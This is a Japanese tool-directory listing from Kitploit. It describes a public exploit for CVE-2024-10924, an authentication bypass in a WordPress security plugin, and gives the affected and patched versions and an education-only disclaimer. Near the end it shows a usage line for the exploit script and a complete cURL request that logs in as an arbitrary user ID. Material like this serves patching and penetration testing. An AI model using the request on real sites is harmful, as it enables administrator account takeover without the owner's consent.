Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10924 | Kitploit
ツール/GitHubGitHub/cy3erdr4g0n/cve-2024-10924
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育
GitHubcy3erdr4g0n/cve-2024-10924

CVE-2024-10924

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-10924 のエクスプロイト (WordPress Really Simple Security プラグイン - 認証バイパス)

📌 概要

CVE-2024-10924 は、WordPress 用 Really Simple Security プラグイン (バージョン 9.0.0 から 9.1.1.1) における重大な認証バイパスの脆弱性です。この脆弱性により、未認証の攻撃者は二要素認証 (2FA) API の欠陥を悪用して、任意のユーザー (管理者を含む) としてログインできます。

CVE ID: CVE-2024-10924

深刻度: 🔥 Critical (CVSS 9.8)

影響を受けるバージョン: Really Simple Security 9.0.0 – 9.1.1.1

パッチ適用済みバージョン: 9.1.2

エクスプロイトタイプ: 認証バイパス

⚠️ 免責事項

🚨 本エクスプロイトは教育およびセキュリティ研究目的のみに使用してください。

所有していないシステムへの不正使用は違法です。このツールの目的は、セキュリティ専門家が脆弱なシステムをテストし、パッチを適用できるよう支援することです。

🔧 要件

脆弱なバージョンの Really Simple Security プラグインが動作している WordPress サイト。 テスト用に Python 3.x または cURL がインストールされていること。 対象の WordPress 管理者ユーザー名 (ユーザー列挙が必要になる場合があります)。

スクリプトの実行:

python3 exploit.py <url example : http://target.com> <user_id>

cURL による手動実行

curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v

ツールをダウンロード